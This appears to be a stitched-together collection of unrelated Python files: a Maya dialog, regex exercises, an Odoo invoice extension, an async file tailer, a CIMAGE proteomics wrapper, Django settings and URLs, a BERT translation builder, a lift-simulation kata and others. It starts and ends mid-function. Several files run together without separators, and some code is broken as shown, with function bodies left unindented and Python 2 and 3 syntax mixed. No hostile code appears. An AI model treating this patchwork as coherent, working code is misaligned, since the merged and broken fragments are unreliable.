        if cmds.window('algaeLights', exists=True):
            delete = cmds.deleteUI('algaeLights')
        if cmds.window('ST_Garage_EXT', exists=True):
            cmds.deleteUI('ST_Garage_EXT')
        if cmds.window('Tree_EXT', exists=True):
            cmds.deleteUI('Tree_EXT')
        if cmds.window('ST_Garage_INT', exists=True):
            cmds.deleteUI('ST_Garage_INT')
        queryWindow = cmds.window('complete', t='Complete Script',
                                  s=False, mnb=False, mxb=False)
        cmds.columnLayout()
        cmds.frameLayout(label='Custom Render Elements ', bgc=[0.6, 0.2, 0.2])
        cmds.separator(h=10, style='in')
        cmds.text(label='Congrats Tool Was Sucessful',
                  align='center')
        cmds.button('Complete', l='Complete', c=partial(self.delete),
                    w=250, h=40)
        cmds.separator(h=10, style='none')
        cmds.setParent('..')
        cmds.showWindow(queryWindow)

    def delete(self, *args):
        """Dismiss the completion dialog and leave a 'Scene_Checked'
        marker locator in the scene."""
        if cmds.window('complete', exists=True):
            delete = cmds.deleteUI('complete')
        cmds.spaceLocator(name='Scene_Checked')
|
# factorial: compute 1*2*3*...*n for a number read from stdin.
n = int(input("Enter a number: "))
fact = 1
# Multiply down from n to 1; for n <= 0 the loop never runs and the
# result stays 1 (matching 0! == 1).
while n >=1:
    fact = fact * n
    n = n - 1
print(fact)
|
# Practice problems (comments translated from Korean)
# Q2: locate the first run of lowercase letters in '3 python'.
import re
p = re.compile('[a-z]+')
m = p.search('3 python')
# 'python' spans indices [2, 8), so start + end == 10.
# NOTE: this shadows the builtin sum().
sum = m.start() + m.end()
print(m.start())
print(m.end())
print(m.group())
print(sum)
# Q3: mask the last four digits of each phone number below.
print('\nQ3')
import re
data ="""
park 010-9999-9988
kim 010-9909-7789
lee 010-8789-7768
"""
def change_phoneNum(data):
    """Mask the last digit group of each 'name 010-xxxx-xxxx' phone
    number in *data* with '####' and print the result."""
    # Raw strings: '\w', '\d' and '\g' are invalid escape sequences in
    # plain literals (DeprecationWarning, SyntaxWarning in newer Python).
    p = re.compile(r'(\w+\s+\d+[-]\d+[-])(\d+)', re.MULTILINE)
    print(p.sub(r'\g<1>####', data))
change_phoneNum(data)
# Q4: extract e-mail addresses whose domain ends in .com or .net.
print('\nQ4')
def imail_check(data):
    """Print the list of local@domain parts for every line of *data*
    ending in '.com' or '.net' (the TLD itself is only matched by the
    lookahead, so it is not included in the results)."""
    pattern = re.compile('.*[@].*(?=[.]com$|[.]net$)', re.MULTILINE)
    print(pattern.findall(data))
data ="""
park@naver.com
kim@daum.net
lee@myhome.co.kr
"""
# Only the .com and .net addresses match; lee@myhome.co.kr is excluded.
imail_check(data)
|
import tree
from collections import OrderedDict
root = tree.create_tree()
# Maps horizontal column offset -> sum of node keys in that column;
# populated by verticalSum via a module-level global.
d = OrderedDict()
def verticalSum(root, column):
    """Accumulate into the module-level dict ``d`` the sum of node keys
    at each horizontal offset *column* from the root (left child is
    column-1, right child is column+1); in-order traversal."""
    global d
    if root is None:
        return None
    verticalSum(root.left, column-1)
    # Bug fix: dict.has_key() was removed in Python 3; the 'in' operator
    # is equivalent and works in both Python 2 and 3.
    if column in d:
        d[column] = d[column] + root.key
    else:
        d[column] = root.key
    verticalSum(root.right, column+1)
verticalSum(root, 0)
# NOTE: Python 2 print statement; under Python 3 this would be print(d).
print d
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.addons.account.models.account_invoice import TYPE2JOURNAL
class AccountInvoice(models.Model):
    """Extends account.invoice with a fallback default-journal lookup and
    restricts the selectable companies to those with a chart template."""
    _inherit = 'account.invoice'

    @api.model
    def _default_journal(self):
        """Return the standard default journal when available; otherwise
        search for the first journal matching the invoice type(s) in the
        default company."""
        journal = super(AccountInvoice, self)._default_journal()
        if journal or self._context.get('company_id'):
            return journal
        inv_type = self._context.get('type', 'out_invoice')
        inv_types = inv_type if isinstance(inv_type, list) else [inv_type]
        company = self.env['res.company']._company_default_get('account.invoice')
        # NOTE(review): under Python 3 filter() returns an iterator; the
        # 'in' domain operand may need list(...) — confirm the target
        # Odoo/Python version.
        domain = [
            ('type', 'in', filter(None, map(TYPE2JOURNAL.get, inv_types))),
            ('company_id', '=', company.id),
        ]
        return self.env['account.journal'].search(domain, limit=1)

    journal_id = fields.Many2one(default=_default_journal)
    # Only companies with an installed chart of accounts are selectable.
    company_id = fields.Many2one(domain=[('chart_template_id', '!=', False)])
|
import asyncio
from threading import Lock, Thread
from concurrent.futures import ThreadPoolExecutor
TPE = ThreadPoolExecutor()
class NoNewData(Exception):
    """Signals that the handle is already positioned at end-of-file."""
    pass


def readline(handle):
    """Return the next line from *handle*, or raise NoNewData when no
    bytes exist past the current read position."""
    position = handle.tell()
    handle.seek(0, 2)           # jump to EOF to learn the current length
    end = handle.tell()
    if end == position:
        raise NoNewData
    handle.seek(position, 0)    # restore the reader's position
    return handle.readline()
import time
def tail_file(handle, interval, write_func):
    """Thread entry point: run tail_async on a fresh per-thread event
    loop, wrapping the synchronous write_func in a coroutine."""
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    async def write_async(data):
        write_func(data)
    coro = tail_async(handle, interval, write_async)
    loop.run_until_complete(coro)
async def tail_async(handle, interval, write_func):
    """Forward new lines from *handle* to *write_func* until the handle
    is closed.

    NOTE: on the first empty poll this sleeps for *interval* and then
    closes the handle itself, ending the loop — deliberate for the
    static test files driven below; a true "tail -f" would keep polling.
    """
    loop = asyncio.get_event_loop()
    while not handle.closed:
        try:
            # Blocking read runs on the shared thread pool so the event
            # loop stays free.
            line = await loop.run_in_executor(TPE, readline, handle)
        except NoNewData:
            await asyncio.sleep(interval)
            handle.close()
        else:
            await write_func(line)
def run_threads(handles, interval, output_path):
    """Tail every handle on its own thread, funneling all lines into
    *output_path*; blocks until every tail thread finishes."""
    with open(output_path, 'wb') as output:
        lock = Lock()
        def write(data):
            # Called concurrently from the tail threads; the lock keeps
            # whole lines from interleaving in the output file.
            with lock:
                output.write(data)
        threads = []
        for handle in handles:
            args = (handle, interval, write)
            thread = Thread(target=tail_file, args=args)
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
def confirm_merge(input_paths, output_path):
    """Sanity check: the total line count across every file in the
    *input_paths* directory must equal the merged output's line count.
    (Relies on the module-level 'import os' executed below, before this
    function is first called.)"""
    inputs_cnt = output_cnt = 0
    for f in os.listdir(input_paths):
        with open(os.path.join(input_paths, f), 'r') as fh:
            inputs_cnt += len(fh.readlines())
    with open(output_path, 'r') as fh:
        output_cnt += len(fh.readlines())
    print(inputs_cnt, output_cnt)
    assert inputs_cnt == output_cnt
import os
# Demo driver: tail every file in test_inputs concurrently, merge the
# lines into merge_test.txt, then verify that no lines were lost.
input_paths = 'test_inputs'
handles = [open(os.path.join(input_paths, f), 'rb') for f in os.listdir(input_paths)]
output_path = 'merge_test.txt'
run_threads(handles, 0.1, output_path)
confirm_merge(input_paths, output_path)
"""Provides interface to CIMAGE."""
from ctesi.utils import CimageParams
from copy import deepcopy
from collections import defaultdict, OrderedDict
import config.config as config
import pathlib
import requests
import subprocess
import os
QUANT_PARAMS_PATH = config.SEARCH_PARAMS_PATH.parent.joinpath('quantification')
def quantify(name, dta_link, experiment_type, path, search_params=None, setup_dta=True):
    """Run CIMAGE quantification for one experiment in both search orders.

    Optionally downloads/sets up the DTASelect folders, symlinks the raw
    mzXML files next to them, then runs cimage in the normal (light/heavy)
    and inverted (heavy/light) orders and combines both. Returns True
    only when every external step exits with status 0.
    """
    if setup_dta:
        setup_dta_folders(name, path, dta_link, search_params)
    dta_paths = _get_dta_paths(name, path)
    for dta_path in dta_paths.values():
        symlink_mzxmls(path, dta_path.parent)
    params_path = str(_get_params_path(experiment_type, path, search_params))
    normal_search = cimage(params_path, dta_paths['lh'], name, hl_flag=False)
    inverse_search = cimage(params_path, dta_paths['hl'], name, hl_flag=True)
    # Subprocess exit status 0 means success.
    if normal_search == 0 and inverse_search == 0:
        return (
            combine(dta_paths['lh'].parent, experiment_type) == 0 and
            combine(dta_paths['hl'].parent, experiment_type) == 0
        )
    else:
        return False
def cimage(params_path, dta_folder_path, name, hl_flag):
    """Invoke the external 'cimage2' tool inside the dta folder and
    return its exit status; hl_flag selects the inverted heavy/light run,
    which uses the '<name>_HL' dataset name."""
    if hl_flag:
        name = '{}_HL'.format(name)
    return subprocess.Popen([
        'cimage2',
        params_path,
        name
    ], cwd=str(dta_folder_path)).wait()
def combine(path, experiment_type, dta_folder='dta'):
    """Run 'cimage_combine' over the cimage output in *path* and return
    its exit status; non-isotop experiments aggregate by protein."""
    args = [
        'cimage_combine',
        'output_rt_10_sn_2.5.to_excel.txt',
        dta_folder
    ]
    if experiment_type != 'isotop':
        args.insert(1, 'by_protein')
    return subprocess.Popen(args, cwd=str(path)).wait()
def symlink_mzxmls(src, dst):
    """Symlink every *.mzXML file found directly under *src* into the
    *dst* directory; already-existing links are left untouched."""
    for mzxml in pathlib.Path(src).glob('*.mzXML'):
        try:
            os.symlink(str(mzxml), str(dst.joinpath(mzxml.name)))
        except FileExistsError:
            pass
def setup_dta_folders(name, path, dta_link, search_params=None):
    """Download the DTASelect-filter results and materialize them as the
    light/heavy input files cimage expects, replacing diff-mod mass
    labels with their single-character symbols. Returns the dta paths."""
    # download dta results
    # yes, this is a publicly accessible url. lol.
    r = requests.get(dta_link)
    dta_content = r.text
    # find and replace diff mods with appropriate symbols
    if search_params and 'diff_mods' in search_params:
        symbol_mod_map = _symbolify_diff_mods(search_params['diff_mods'])[0]
        for symbol, mods in symbol_mod_map.items():
            for mod in mods:
                dta_content = dta_content.replace('({})'.format(mod['mass']), symbol)
    dta_paths = _get_dta_paths(name, path)
    for dta_path in dta_paths.values():
        dta_path.mkdir(parents=True, exist_ok=True)
        # The same downloaded content serves as both the 'light' and
        # 'heavy' input file.
        dta_path.joinpath('DTASelect-filter_{}_light.txt'.format(name)).write_text(dta_content)
        dta_path.joinpath('DTASelect-filter_{}_heavy.txt'.format(name)).write_text(dta_content)
    return dta_paths
def _get_dta_paths(name, path):
return {
'lh': path.joinpath('{}_LH'.format(name), 'dta'),
'hl': path.joinpath('{}_HL'.format(name), 'dta')
}
def _get_params_path(experiment_type, path, search_params=None):
    """Resolve the cimage .params file for *experiment_type*, building a
    customized experiment-local copy when diff mods were requested."""
    base = QUANT_PARAMS_PATH.joinpath(experiment_type).with_suffix('.params').resolve()
    if not (search_params and 'diff_mods' in search_params):
        return base
    return _make_custom_params(path, base, search_params['diff_mods'])
def _make_custom_params(exp_path, params_path, diff_mods):
    """Write experiment-local custom.params plus custom.light and
    custom.heavy chem tables containing a row per symbol-assigned diff
    mod, and return the path of the generated params file."""
    params = CimageParams(str(params_path))
    (symbol_mod_map, diff_mods) = _symbolify_diff_mods(diff_mods)
    for symbol, mods in symbol_mod_map.items():
        for mod in mods:
            # One chem-table row per mod: atom counts taken from the
            # mod's composition, zero for atoms it lacks.
            row = OrderedDict()
            for atom in params.chem_headers:
                if atom in mod['comp']:
                    row[atom.upper()] = mod['comp'][atom]
                else:
                    row[atom.upper()] = 0
            if mod['light']:
                params.light[mod['symbol']] = row
            if mod['heavy']:
                params.heavy[mod['symbol']] = row
    light_path = exp_path.resolve().joinpath('custom.light')
    heavy_path = exp_path.resolve().joinpath('custom.heavy')
    custom_params_path = exp_path.resolve().joinpath('custom.params')
    # Point the params file at the freshly written chem tables.
    params['light.chem.table'] = str(light_path)
    params['heavy.chem.table'] = str(heavy_path)
    params.write_file(str(custom_params_path))
    params.write_chem_tables(light_path=str(light_path), heavy_path=str(heavy_path))
    return custom_params_path
def _symbolify_diff_mods(diff_mods):
    """Assign each diff mod one of the cimage symbols ('*', '#', '@').

    A mod present in both light and heavy gets its own symbol; a
    light-only mod is paired with an unassigned heavy-only mod sharing
    the same isotope-collapsed ('degen') formula, and the pair shares one
    symbol. Returns (symbol -> [mods] map, annotated copy of diff_mods);
    assignment stops silently when the three symbols run out.
    """
    # we're mutating this a lot, better to work on copy
    diff_mods = _degen_annotate_diff_mods(deepcopy(diff_mods))
    diff_symbols = ['*', '#', '@']
    symbols = iter(diff_symbols)
    symbol_mod_map = defaultdict(list)
    for mod in diff_mods:
        # make sure we haven't already paired this one up
        if 'symbol' in mod:
            symbol_mod_map[mod['symbol']].append(mod)
            continue
        try:
            # first we add diff-mods that appear in both light and heavy
            # and then attempt to find a pair
            if mod['light'] and mod['heavy']:
                mod['symbol'] = next(symbols)
            elif mod['light'] or mod['heavy']:
                opposite = 'heavy' if mod['light'] else 'light'
                same = 'light' if mod['light'] else 'heavy'
                # find another diff mod with same isotopically degerate formula
                paired_mod = next((
                    x for x in diff_mods
                    if 'symbol' not in x
                    and x[opposite]
                    and not x[same]
                    and x['degen'] == mod['degen']
                ), None)
                symbol = next(symbols)
                if paired_mod:
                    paired_mod['symbol'] = symbol
                mod['symbol'] = symbol
            if 'symbol' in mod:
                symbol_mod_map[mod['symbol']].append(mod)
        except StopIteration:
            # we've run out of symbols to hand out...
            break
    return (symbol_mod_map, diff_mods)
def _degen_annotate_diff_mods(diff_mods):
# group diff mods by chemical formula not taking into account isotopic composition
# these molecules get the same symbol
degen_map = {
'C': 'C13',
'H': 'H2',
'N': 'N15'
}
for mod in diff_mods:
mod['degen'] = deepcopy(mod['comp'])
for element, isotope in degen_map.items():
if isotope in mod['degen']:
mod['degen'][element] += mod['degen'][isotope]
del mod['degen'][isotope]
return diff_mods
|
class Book():
    """Simple value object pairing a book's text with its name."""

    def __init__(self, text, name):
        self.text = text
        self.name = name

    # Bug fix: both accessors were missing 'self', so every call raised
    # TypeError ("takes 0 positional arguments but 1 was given").
    def getText(self):
        return self.text

    def getName(self):
        return self.name
|
#import sys
#input = sys.stdin.readline
from math import sqrt
def main():
    """Read N 2-D integer vectors from stdin and print the largest
    Euclidean norm achievable by summing a subset of them, estimated
    from quadrant aggregates.

    Vectors are bucketed into the four closed quadrants (axis-aligned
    vectors land in two buckets); x_plus/x_minus/y_plus/y_minus record
    the axis totals so combined sums can correct the double counting.
    NOTE(review): the two intermediate print() calls look like leftover
    debug output — confirm the expected stdout format.
    """
    N = int( input())
    # SX[i]/SY[i]: component sums per quadrant
    # (0: x>=0,y>=0; 1: x>=0,y<=0; 2: x<=0,y>=0; 3: x<=0,y<=0).
    SX = [0 for _ in range(4)]
    SY = [0 for _ in range(4)]
    x_plus = 0
    x_minus = 0
    y_plus = 0
    y_minus = 0
    for _ in range(N):
        x, y = map( int, input().split())
        if x >= 0:
            if y >= 0:
                SX[0] += x
                SY[0] += y
            if y <= 0:
                SX[1] += x
                SY[1] += y
        if x <= 0:
            if y >= 0:
                SX[2] += x
                SY[2] += y
            if y <= 0:
                SX[3] += x
                SY[3] += y
        # Axis-aligned vectors were counted in two quadrants above;
        # remember their totals so one copy can be subtracted later.
        if x == 0:
            if y > 0:
                y_plus += y
            else:
                y_minus += y
        if y == 0:
            if x > 0:
                x_plus += x
            else:
                x_minus += x
    ans = 0
    print(SX, SY, y_plus)
    # Best single quadrant.
    for i in range(4):
        if ans**2 < SX[i]**2 + SY[i]**2:
            ans = sqrt(SX[i]**2 + SY[i]**2)
    print(ans)
    # Combine pairs of quadrant sums with axis corrections.
    # NOTE(review): the (0,3)/(1,2) pairings with x_plus/x_minus
    # corrections are not obviously half-planes — verify the intent.
    S = (SX[0]+SX[3]-x_plus)**2 + (SY[0]+SY[3])**2
    if ans**2 < S:
        ans = sqrt(S)
    S = (SX[1]+SX[2]-x_minus)**2 + (SY[1]+SY[2])**2
    if ans**2 < S:
        ans = sqrt(S)
    S = (SX[0]+SX[1])**2 + (SY[0]+SY[1] - y_plus)**2
    if ans**2 < S:
        ans = sqrt(S)
    S = (SX[2]+SX[3])**2 + (SY[2]+SY[3] - y_minus)**2
    if ans**2 < S:
        ans = sqrt(S)
    print(ans)


if __name__ == '__main__':
    main()
|
from ajax_select import LookupChannel, register
from . import models as base
from . import society
@register('society_look')
class SocietyLookup(LookupChannel):
    """ajax_select channel: case-insensitive partner-name autocompletion
    over ResPartner, ordered alphabetically.

    Renamed from PartnersPostLookup: the module defined two classes with
    that name, so this one was shadowed at module level (the channel
    itself still worked because @register runs at class creation time).
    """
    model = base.ResPartner

    def get_query(self, q, request):
        return self.model.objects.filter(name__icontains=q).order_by('name')
@register('partner_post_look')
class PartnersPostLookup(LookupChannel):
    """ajax_select channel: case-insensitive post-name autocompletion
    over ResPost, ordered alphabetically."""
    model = base.ResPost

    def get_query(self, q, request):
        return self.model.objects.filter(name__icontains=q).order_by('name')
|
def binary_search(x, lst, low=None, high=None) :
    """Return the index of *x* in sorted list *lst*, or None if absent.

    low/high default to the full range. Bug fix: the original used a
    'start:' label with 'goto' — not valid Python (SyntaxError); the
    tail calls are rewritten as an iterative loop with the same
    semantics.
    """
    if low is None :
        low = 0
    if high is None :
        high = len(lst)-1
    while low <= high :
        # Overflow-safe midpoint (also the original's formulation).
        mid = low + (high - low) // 2
        if lst[mid] == x :
            return mid
        elif lst[mid] > x :
            high = mid - 1
        else :
            low = mid + 1
    return None
|
import json
import os
from unipath import Path
from .base import *
# Staging settings: load secrets from staging_secrets.json and override
# the base configuration.
DEV_SECRETS_PATH = SETTINGS_PATH.child("staging_secrets.json")
with open(os.path.join(DEV_SECRETS_PATH)) as f: secrets = json.loads(f.read())
INSTALLED_APPS = INSTALLED_APPS + ('mod_wsgi.server', )
PROPAGATE_EXCEPTIONS = True
# NOTE(review): DEBUG enabled in a staging settings file — confirm this
# is intentional before deploying.
DEBUG=True
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'blast_cache_db',
        'USER': get_secret("BC_USER", secrets),
        'PASSWORD': get_secret("BC_PASSWORD", secrets),
        # NOTE(review): HOST '1' looks like a placeholder — verify.
        'HOST': '1',
        'PORT': '5432',
    }
}
# Empty strings below appear to be redacted host names.
ALLOWED_HOSTS = [
    'localhost',
    '127.0.0.1',
    '',
    '',
    '',
]
CORS_ORIGIN_WHITELIST = (
    '127.0.0.1:4000',
    '',
    '',
    '',
    '',
)
STATIC_URL = '/static_dev/'
SECRET_KEY = get_secret("BC_SECRET_KEY", secrets)
# TODO: Change this for staging and production
MEDIA_URL = '/submissions/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'submissions')
#
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_HOST = 'smtp.cs.ucl.ac.uk'
# # EMAIL_HOST_USER = 'psipred@cs.ucl.ac.uk'
# DEFAULT_FROM_EMAIL = 'psipred@cs.ucl.ac.uk'
|
import torch
from transformers import BertConfig, BertModel, BertForMaskedLM, BertTokenizer
from transformers import DistilBertConfig
from transformers import DistilBertTokenizer, DistilBertModel, DistilBertForMaskedLM
from transformers import GPT2Model, GPT2Config
from easydict import EasyDict as ED
def build_model_pretrained(config):
    """Assemble a translation model from pretrained transformers.

    Encoder: multilingual DistilBERT. Decoder: pretrained BERT MLM when
    config.decoder.pretrained is set, otherwise a freshly initialized
    decoder-configured BERT over the target vocabulary. Returns
    (model, tokenizers) with tokenizers.src / tokenizers.tgt.
    NOTE(review): TranslationModel is defined elsewhere in this project;
    model.cuda() requires a CUDA device.
    """
    #Create different tokenizers for both source and target language.
    src_tokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-multilingual-cased')
    tgt_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
    # BERT's tokenizer has no BOS/EOS by default; register them for
    # sequence generation on the target side.
    tgt_tokenizer.bos_token = '<s>'
    tgt_tokenizer.eos_token = '</s>'
    #encoder_config = DistilBertConfig.from_pretrained('distilbert-base-multilingual-cased')
    encoder = DistilBertModel.from_pretrained('distilbert-base-multilingual-cased')
    if config.decoder.pretrained:
        decoder = BertForMaskedLM.from_pretrained('bert-base-uncased')
    else:
        decoder_config = BertConfig(vocab_size=tgt_tokenizer.vocab_size,
                                    is_decoder=True)
        decoder = BertForMaskedLM(decoder_config)
    model = TranslationModel(encoder, decoder)
    model.cuda()
    tokenizers = ED({'src': src_tokenizer, 'tgt': tgt_tokenizer})
    return model, tokenizers
|
'''
A multi-floor building has a Lift in it.
People are queued on different floors waiting for the Lift.
Some people want to go up. Some people want to go down.
The floor they want to go to is represented by a number (i.e. when they enter the Lift this is the button they will press)
Lift Rules
1.The Lift only goes up or down!
2.The Lift never changes direction until there are no more people wanting to get on/off in the direction it is already travelling
3.When empty the Lift tries to be smart. For example,
4. -If it was going up then it may continue up to collect the highest floor person wanting to go down
-If it was going down then it may continue down to collect the lowest floor person wanting to go up
5. The Lift has a maximum capacity of people which is variable (input in the test cases)
6. If the lift is empty, and no people are waiting, then it will return to the ground floor (0)
7. Only people going the same direction as the Lift may enter it, and they do so according to their "queue" order
### Input now is set to a tuple (all the floors) of tuples (all the people waiting at each floor) ###
### Output now is set to a list of all the floors the lift has stopped at ###
'''
class Dinglemouse(object):
    """Lift-kata simulator: alternates upward and downward sweeps, recording
    every floor the lift stops at in self.solution.

    NOTE(review): the branch logic below is order-sensitive and carries
    several quirks (see inline notes); it is documented as-is, not cleaned.
    """
    def __init__(self, queues, capacity):
        # Mutable copies of the per-floor queues; index == floor number,
        # values are the destination floors people will press.
        self.queues = [list(x) for x in queues]
        print(self.queues, '\t', 'queues in the beginning.')
        # Maximum number of passengers the lift can carry at once.
        self.capacity = capacity
        # Floors visited so far; the lift starts at the ground floor (0).
        self.solution = [0]
    def theLift(self):
        """Run up/down sweeps until every queue is empty; return the list
        of visited floors (always terminated with the ground floor)."""
        while any(q != [] for q in self.queues):
            self.down((self.up()))
        if self.solution[-1] != 0 : self.solution.append(0)
        print(self.solution, '\t', 'solution after all functions performed')
        return self.solution
    def up(self):
        """One bottom-to-top sweep; returns the destinations of passengers
        still on board so down() can continue with them."""
        lift_state = []  # destination floors of the current passengers
        for i, q in enumerate(self.queues):
            lift_state = sorted(lift_state)
            # NOTE(review): enumerate never yields i == len(self.queues),
            # so this break is unreachable dead code.
            if i == len(self.queues): break
            elif q == [] and any(x == i for x in lift_state):
                # Nobody waiting here, but a passenger disembarks.
                self.solution.append(i)
                lift_state = [x for x in lift_state if x != i]
            elif q == [] : pass
            elif all(x < i for x in q[:self.capacity-len(lift_state)]):
                # Everyone who could board wants to go down — skip on the
                # upward sweep.
                pass
            elif len(lift_state) == self.capacity:
                # Lift is full: only stop if a passenger leaves at floor i.
                temp_list = [x for x in lift_state if x >= i]
                if temp_list != []:
                    if i == temp_list[0]:
                        lift_state = [x for x in lift_state if x != i]
                        # Board waiting people into the freed space.
                        [lift_state.append(x) for x in q if len(lift_state) < self.capacity]
                        # NOTE(review): only one person is removed from the
                        # queue even if several boarded above — verify
                        # against the kata rules.
                        del self.queues[i][0]
                        self.solution.append(i)
            else:
                try:
                    # Disembark at i and board as many waiting people as
                    # capacity allows, consuming the queue front-first.
                    while len(lift_state) < self.capacity and self.queues[i] != []:
                        lift_state = [x for x in lift_state if x != i]
                        lift_state.append(self.queues[i][0])
                        del self.queues[i][0]
                except Exception as e:
                    print(e, i, q, lift_state, 'error in UP()')
                    pass
                if i != self.solution[-1]: self.solution.append(i)
        #print(self.queues, '\t', 'queues after function up()')
        #print(lift_state, '\t', 'lift_state after function up()')
        return lift_state
    def down(self, lift_state):
        """Mirror image of up(): one top-to-bottom sweep starting with the
        passengers left over from the upward sweep."""
        for i, q in reversed(list(enumerate(self.queues))):
            lift_state = sorted(lift_state, reverse=True)
            # NOTE(review): unreachable, as in up().
            if i == len(self.queues): break
            elif q == [] and any(x == i for x in lift_state):
                self.solution.append(i)
                lift_state = [x for x in lift_state if x != i]
            elif q == [] : pass
            elif all(x > i for x in q[:self.capacity-len(lift_state)]):
                # Everyone boardable wants to go up — skip on the way down.
                pass
            elif len(lift_state) == self.capacity:
                temp_list = [x for x in lift_state if x <= i]
                if temp_list != []:
                    if i == temp_list[0]:
                        lift_state = [x for x in lift_state if x != i]
                        [lift_state.append(x) for x in q if len(lift_state) < self.capacity]
                        del self.queues[i][0]
                        self.solution.append(i)
            else:
                try:
                    while len(lift_state) < self.capacity and self.queues[i] != []:
                        lift_state = [x for x in lift_state if x != i]
                        lift_state.append(self.queues[i][0])
                        del self.queues[i][0]
                except Exception as e:
                    print(e, i, q, lift_state, 'error in DOWN()')
                    pass
                if i != self.solution[-1]: self.solution.append(i)
        #print(self.queues, '\t', 'queues after function down()')
        #print(lift_state, '\t', 'lift_state after function down()')
# Floors:    G     1      2        3     4      5      6         Answers:               Lift capacity:
tests = [[ ( (),   (),    (5,5,5), (),   (),    (),    () ),     [0, 2, 5, 0],          5 ],
         [ ( (),   (),    (1,1),   (),   (),    (),    () ),     [0, 2, 1, 0],          5 ],
         [ ( (),   (3,),  (4,),    (),   (5,),  (),    () ),     [0, 1, 2, 3, 4, 5, 0], 5 ],
         [ ( (),   (0,),  (),      (),   (2,),  (3,),  () ),     [0, 5, 4, 3, 2, 1, 0], 5 ],
         [ ( (2,3,4,5,6,1,1), (),  (),   (),    (),    (), () ), [0,2,3,0,4,5,0,1,6,0,1,0], 2 ],
         [ ( (2,3,4,5,6,1,1), (),  (),   (),    (),    (), () ), [0,2,3,4,5,6,0,1,0],   5 ]]
# Run each scenario; the simulator prints its own stop sequence, then we
# print the known-good answer for manual comparison.
for floor_queues, expected, cap in tests:
    Dinglemouse(floor_queues, cap).theLift()
    print(expected, '\t', 'correct answer', '\n')
|
import routes.error_handlers
import routes.headphonecheck
import routes.audiofreq
import routes.audiopilot
import routes.psychquiz
|
from django.conf.urls import url
from . import views
from django.contrib.auth import views as auth_views
# URL routes for the blog app.
# NOTE(review): auth_views.login/logout are the old function-based auth
# views (removed in Django 2.1); this file targets an older Django where
# they still exist.
urlpatterns = [
    url(r'^$',views.home,name='home'),
    url(r'^accounts/profile/$',views.post_list,name='post_list'),
    url(r'^signin/$',auth_views.login, {'template_name': 'blog/login.html'}, name='login'),
    url(r'^logout/$', auth_views.logout, {'next_page': 'login'}, name='logout'),
    url(r'^signup/$', views.signup, name='signup'),
    url(r'^post_new/$', views.post_new, name='post_new'),
    url(r'^send_sqs_get_images/$', views.send_sqs, name='send_sqs'),
]
|
from matplotlib import pyplot as plt
import numpy as np
from sklearn import datasets,linear_model
from sklearn.metrics import mean_squared_error,r2_score

# Load the diabetes dataset and keep a single feature (column 2) as a
# (n_samples, 1) design matrix so LinearRegression accepts it.
diabetes=datasets.load_diabetes()
diabetes_X=diabetes.data[:,np.newaxis,2]

# Split data into training and testing sets.
# BUG FIX: the test split previously reused the training slice [:-20],
# so the model was evaluated on its own training data; hold out the
# final 20 samples for testing instead.
diabetes_X_train=diabetes_X[:-20]
diabetes_Y_train=diabetes.target[:-20]
diabetes_X_test=diabetes_X[-20:]
diabetes_Y_test=diabetes.target[-20:]

# Create and train an ordinary least squares regression model.
regr=linear_model.LinearRegression()
regr.fit(diabetes_X_train,diabetes_Y_train)

# Predict on the held-out test set.
diabetes_Y_pred=regr.predict(diabetes_X_test)

# Report the fitted coefficient and test-set metrics.
# NOTE(review): "%2f" below is a width-2 float (not "%.2f"); kept as-is
# to avoid changing the printed output format.
print("Coefficients : \n ",regr.coef_)
print("Mean squared error:%.2f"%mean_squared_error(diabetes_Y_test,diabetes_Y_pred))
print("Variance Score : %2f"%r2_score(diabetes_Y_test,diabetes_Y_pred))

# Plot the test points and the fitted regression line.
plt.scatter(diabetes_X_test,diabetes_Y_test,color='red')
plt.plot(diabetes_X_test,diabetes_Y_pred,color='blue',linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
import django_rq
from django.contrib import admin
from neoprospecta.parameter.models import EntryParameter, PaginationParameter
# Register your models here.
from util.import_entry import Process, process_entry
def to_process_entry(self, request, queryset):
    """Admin action: enqueue a background job that processes entries.

    Note: a single process_entry job is enqueued regardless of how many
    rows are selected — queryset is not consulted.
    """
    django_rq.get_queue().enqueue(process_entry)
    self.message_user(request, "A entry será processada em breve")
to_process_entry.short_description = "Processar entries"
class EntryParameterAdmin(admin.ModelAdmin):
    """Admin listing for EntryParameter with the enqueue action attached."""
    list_display = ('name', 'row_start', 'row_end')
    search_fields = ('name',)
    actions = [to_process_entry]
admin.site.register(EntryParameter, EntryParameterAdmin)
class PaginationParameterAdmin(admin.ModelAdmin):
    """Admin listing for PaginationParameter."""
    list_display = ('name', 'rows' )
    search_fields = ('name',)
admin.site.register(PaginationParameter, PaginationParameterAdmin)
from django.urls import path
from . import views
# from .routers import router
# All routes are currently disabled; the commented entries are kept as a
# record of previously wired (or planned) endpoints.
urlpatterns = [
    # url('^$', views.index),
    # url('slack/oauth/', views.SocialLoginView.as_view()),
    # path('sforce/', views.ContactViewSet.as_view()),
    # path("sforce/add/", views.SalesForceDetailStore.as_view()),
    # path("sforce/edit/<int:pk>/", views.SalesForceDetailUpdate.as_view()),
    # path('event/hook/', views.event_hook, name='event_hook')
    # path('hubspot/webhook/', HubspotWebhookView.as_view(), name='hubspot_webhook'),
    # path('django_pipedrive/', include('django_pipedrive.urls')),
]
|
import numpy
import keras
from labels import LABEL_SPATIAL, LABEL_OTHER
from keras import layers
from pyfasttext import FastText
from callbacks import ClassAccuracy, Accuracy
class FeatureGenerator:
    """Builds fastText-embedding feature vectors for (trajector,
    spatial-indicator, landmark) word triples."""
    def __init__(self, fastext_path):
        # Load the pretrained fastText model from disk.
        self.fasttext = FastText(fastext_path)
    def generate_record(self, tuple):
        # NOTE(review): the parameter name shadows the builtin `tuple`;
        # renaming would be cleaner but could break keyword callers.
        tr = self.fasttext.get_numpy_vector(tuple[0])  # trajector
        si = self.fasttext.get_numpy_vector(tuple[1])  # spatial indicator
        lm = self.fasttext.get_numpy_vector(tuple[2])  # landmark
        #return numpy.concatenate((tr, lm))
